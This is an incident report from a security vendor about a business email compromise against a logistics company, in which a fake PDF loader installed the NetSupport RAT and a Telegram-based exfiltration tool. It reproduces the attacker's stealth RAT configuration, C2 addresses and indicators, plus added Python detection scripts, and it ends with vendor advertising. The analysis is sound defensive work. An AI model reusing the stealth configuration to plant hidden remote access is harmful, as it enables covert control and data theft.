Real case: Logistics sector company victim of BEC fraud with NetSupport RAT (client name omitted for confidentiality)
On December 16, 2025, we detected an active compromise initiated through a Spear Phishing campaign targeting the logistics sector. The attackers maintained an email conversation for more than a week (since December 8) posing as a legitimate customer (“Michał Grzegorzewski”) negotiating transport loads, gaining the victim’s trust.
The attack culminated by redirecting the victim to a fraudulent portal (euroads[.]eu) to download a supposed “cargo order”. The downloaded file, Order_024771.exe, was a Compiled Python Loader with a fake PDF icon.
Upon execution, this binary connected to VPS infrastructure in New York (173.225.111.189) to download the second stage of the attack: the commercial RAT NetSupport Manager (from NETSUPPORT LTD.) and a .NET-based exfiltration tool that abuses the Telegram API and which, judging from the strings recovered, appears to have been AI-generated.
The entry vector is distinguished by its high sophistication and patience. Unlike mass campaigns, the attacker maintained a coherent email thread negotiating prices (€1,200 - €1,500), routes (NL to FR), and technical details (FTL, 8T) for 8 days.
On December 16, after simulating an agreement, the attacker (“Michał”) instructed the victim to register on an external platform to “reserve the load” and download the order PDF.
Excerpt from malicious email (The hook):
```text
From: Michał Grzegorzewski <mgrzegorzewski2.kaspeda@gmail.com>
Sent: Tuesday, December 16, 2025 11:31
To: [REDACTED]
Subject: Re: Invoice with POD
```
The victim accessed the domain euroads[.]eu/order, a cloned/fraudulent portal, where they downloaded the malicious file.
The downloaded file was named Order_024771.exe. Despite having a PDF document icon to deceive the user, it was a compiled Python executable that acted as a loader for the Telegram.exe tool (explained later) and the modified NetSupport executable.
Immediately after manual execution by the user, the Order_024771.exe process initiated an outbound network connection to retrieve the final payloads.
Connection destination: the VPS at 173.225.111.189 (New York) already noted above. This IP corresponds to a VPS rented by the attacker and used as the first-stage C2.
Once the VPS was contacted, the stager dropped the NetSupport Manager components to disk.
During forensic disk analysis, we recovered the malware configuration file (Client32.ini). Its content confirms malicious intent, as it disables all visual alerts for the user and configures external Command and Control (C2) servers.
Recovered configuration:
```ini
[Client]
_present=1
DisableChatMenu=1         ; Prevents the user from seeing chat options
DisableClientConnect=1    ; Hides the connection
DisableDisconnect=1       ; Prevents the user from disconnecting the RAT
HideWhenIdle=1
ShowUIOnConnect=0         ; Does not show the interface when the attacker connects
silent=1                  ; Silent mode activated
SysTray=0                 ; Hides the icon in the taskbar
Usernames=*               ; Allows connection to any logged-in user
[HTTP]
GatewayAddress=akusa.icu:443            ; Primary C2
SecondaryGateway=45.93.20.177:443       ; Backup C2 (IP of Chang Way Technologies Co. Limited)
GSK=EDHF;I>MBBEHHO<G
```
Interpretation: The attacker has configured the RAT to be invisible to the user (SysTray=0, silent=1). It uses a domain (akusa.icu) as the primary gateway and a direct IP as a backup to guarantee connectivity. The GSK value is the encryption key needed to communicate with the attacker’s Gateway.
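As an added example (not part of the original report), the following Python triage reads a recovered Client32.ini and flags the stealth keys and external gateways discussed above. The allowlist of approved gateways is an assumption standing in for an organisation's own NetSupport infrastructure, and the sample configuration is constructed from the recovered values with the annotations removed.

```python
import configparser
import re

# Client32.ini settings that make the client invisible to the logged-in user.
STEALTH_SETTINGS = {"silent": "1", "SysTray": "0", "ShowUIOnConnect": "0",
                    "HideWhenIdle": "1", "DisableChatMenu": "1",
                    "DisableClientConnect": "1", "DisableDisconnect": "1"}
# Hypothetical allowlist standing in for an organisation's own NetSupport gateway.
APPROVED_GATEWAYS = {"nsm-gateway.corp.example"}

# Constructed sample reproducing the recovered values, with the annotations removed.
SAMPLE_INI = """[Client]
_present=1
DisableChatMenu=1
DisableClientConnect=1
DisableDisconnect=1
HideWhenIdle=1
ShowUIOnConnect=0
silent=1
SysTray=0
Usernames=*
[HTTP]
GatewayAddress=akusa.icu:443
SecondaryGateway=45.93.20.177:443
GSK=EDHF;I>MBBEHHO<G
"""


def analyze_client32(ini_text):
    """Report which stealth keys are set and where the client calls home."""
    # No inline-comment prefixes, so the ';' inside the GSK value is kept intact.
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # preserve key case (SysTray, not systray)
    cp.read_string(ini_text)
    client = cp["Client"] if cp.has_section("Client") else {}
    http = cp["HTTP"] if cp.has_section("HTTP") else {}
    stealth = [k for k, v in STEALTH_SETTINGS.items() if client.get(k) == v]
    gateways = []
    for key in ("GatewayAddress", "SecondaryGateway"):
        if key in http:
            host = http[key].rsplit(":", 1)[0]  # drop the :port suffix
            gateways.append({"key": key, "host": host,
                             "raw_ip": bool(re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host)),
                             "approved": host in APPROVED_GATEWAYS})
    unapproved = [g["host"] for g in gateways if not g["approved"]]
    # Several stealth flags plus a gateway we do not own is the pattern in this case.
    verdict = "malicious" if len(stealth) >= 3 and unapproved else "review"
    return {"stealth": stealth, "gateways": gateways, "unapproved": unapproved,
            "any_user": client.get("Usernames") == "*", "verdict": verdict}
```

Run on SAMPLE_INI it reports all seven stealth keys, both unapproved gateways (the second a raw IP) and the wildcard Usernames, giving the verdict "malicious".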
Parallel to the RAT, a binary named Telegram.exe was deployed. Forensic analysis confirms it is not the official application, but a .NET tool developed by the attacker.
Purpose: Use the public Telegram API as a Command and Control (C2) channel. This allows data exfiltration traffic to blend with legitimate HTTPS traffic, making detection by conventional firewalls difficult.
| Merabytes Defense Area | How It Would Have Acted | Expected Result |
|---|---|---|
| Email behavior analysis | Detection of prolonged social engineering: unusual negotiation followed by external link for “order” download. | Early alert before users download malicious executable. |
| Endpoint threat analysis | Detection of Python Loader running from Downloads with immediate C2 connection to foreign VPS. | Block loader before downloading RAT. |
| Commercial RAT detection | Identification of NetSupport Client.exe running from non-standard directories with silent configuration. | RAT process termination and endpoint isolation. |
| Side-Loading monitoring | Detection of Client.exe loading malicious DLLs from temporary directories instead of Program Files. | Prevention of malicious component loading. |
| Telegram traffic analysis | Detection of unofficial Telegram.exe (.NET) communicating with Telegram API for C2/exfiltration. | Block alternative C2 channel and prevent exfiltration. |
| Vulnerability and IOC analysis | Updated database with attack IOCs: hashes, domains (euroads[.]eu, akusa.icu), IPs (173.225.111.189). | Proactive blocking of known malicious infrastructure. |
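Added example, not from the report or from Merabytes: the three endpoint rows of the table (loader from Downloads with immediate C2 connection, NetSupport client outside Program Files, unofficial Telegram.exe talking to the Telegram API) expressed as rules over constructed process and network telemetry. The Telegram Desktop install path and the client32.exe image name are assumptions; paths, pids and timestamps are made up, while the image names and destinations come from the write-up.

```python
import ipaddress

# Constructed telemetry mirroring the chain in this report: image names and
# destinations come from the write-up, paths, pids and timestamps are made up.
EVENTS = [
    {"ts": 0.0, "type": "process", "pid": 4100, "image": r"C:\Users\ops\Downloads\Order_024771.exe"},
    {"ts": 2.5, "type": "network", "pid": 4100, "dest": "173.225.111.189"},
    {"ts": 9.0, "type": "process", "pid": 4188, "image": r"C:\Users\ops\AppData\Local\Temp\nsm\client32.exe"},
    {"ts": 10.0, "type": "process", "pid": 4200, "image": r"C:\Users\ops\AppData\Local\Temp\nsm\Telegram.exe"},
    {"ts": 11.0, "type": "network", "pid": 4200, "dest": "api.telegram.org"},
    {"ts": 30.0, "type": "process", "pid": 5000, "image": r"C:\Program Files\NetSupport\NetSupport Manager\client32.exe"},
]
BEACON_WINDOW = 60.0  # seconds from process start to first external connection
# Assumed official Telegram Desktop install path (per-user roaming profile).
TELEGRAM_OFFICIAL = "\\appdata\\roaming\\telegram desktop\\"
# The report names the RAT binary Client.exe; client32.exe is NetSupport's usual image name.
NETSUPPORT_IMAGES = ("client.exe", "client32.exe")


def _external(dest):
    """True for a public IP; hostnames are treated as external for this check."""
    try:
        return ipaddress.ip_address(dest).is_global
    except ValueError:
        return True


def detect(events):
    """Apply the three endpoint rules from the table; return (rule, pid, image) hits."""
    net = [e for e in events if e["type"] == "network"]
    hits = []
    for start in (e for e in events if e["type"] == "process"):
        pid, img = start["pid"], start["image"].lower()
        name = img.rsplit("\\", 1)[-1]
        # Rule 1: NetSupport client outside Program Files (side-loaded from Temp etc.).
        if name in NETSUPPORT_IMAGES and not img.startswith("c:\\program files"):
            hits.append(("netsupport_nonstandard_path", pid, start["image"]))
        # Rule 2: Telegram.exe outside the official path that talks to the Telegram API.
        if name == "telegram.exe" and TELEGRAM_OFFICIAL not in img and any(
                e["pid"] == pid and e["dest"].lower().endswith("telegram.org") for e in net):
            hits.append(("unofficial_telegram_c2", pid, start["image"]))
        # Rule 3: binary launched from Downloads that beacons out within the window.
        if "\\downloads\\" in img and any(
                e["pid"] == pid and _external(e["dest"])
                and 0 <= e["ts"] - start["ts"] <= BEACON_WINDOW for e in net):
            hits.append(("downloads_loader_beacon", pid, start["image"]))
    return hits
```

The legitimately installed client32.exe under Program Files (pid 5000) produces no hit, which is what separates the RAT deployment from an authorised NetSupport installation.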
#cybersecurity #bec #businessemailcompromise #netsupport #rat #logistics #dfir #merabytes
If you’re interested in protecting your infrastructure against sophisticated BEC attacks and commercial RATs, visit merabytes.com and request access to our continuous monitoring, endpoint protection, and behavior analysis services.
Discover how our Adversary-Aware Security Operations Center proactively identifies and neutralizes threats before they impact your business.
An Adversary-Aware SOC goes beyond traditional security monitoring by understanding attacker tactics, techniques, and procedures (TTPs). We proactively hunt for threats using MITRE ATT&CK framework, behavioral analysis, and threat intelligence to detect attacks that bypass conventional security controls.
Traditional security tools focus on known signatures and indicators. Our behavioral detection analyzes anomalies in user activity, email patterns, network traffic, and system behavior to identify sophisticated attacks that use legitimate tools or bypass authentication controls. This caught the attacks in these case studies before significant damage occurred.
Our SOC operates 24/7 with real-time monitoring and automated response capabilities. Critical alerts trigger immediate investigation and containment actions within minutes. We provide continuous threat hunting, forensic analysis, and coordinated incident response to minimize impact and prevent lateral movement.
We combine global threat intelligence feeds with our own research from real incidents. Every attack we analyze contributes to our detection rules and IOC database, which is immediately shared across all protected environments. This means if we see a new attack pattern targeting one client, all clients are automatically protected within hours.
Absolutely. Our SOC integrates with your existing EDR, XDR, SIEM, firewalls, email security, and identity protection tools. We enhance their effectiveness by correlating events across all sources, applying adversary-aware detection logic, and providing expert human analysis that automated tools alone cannot achieve.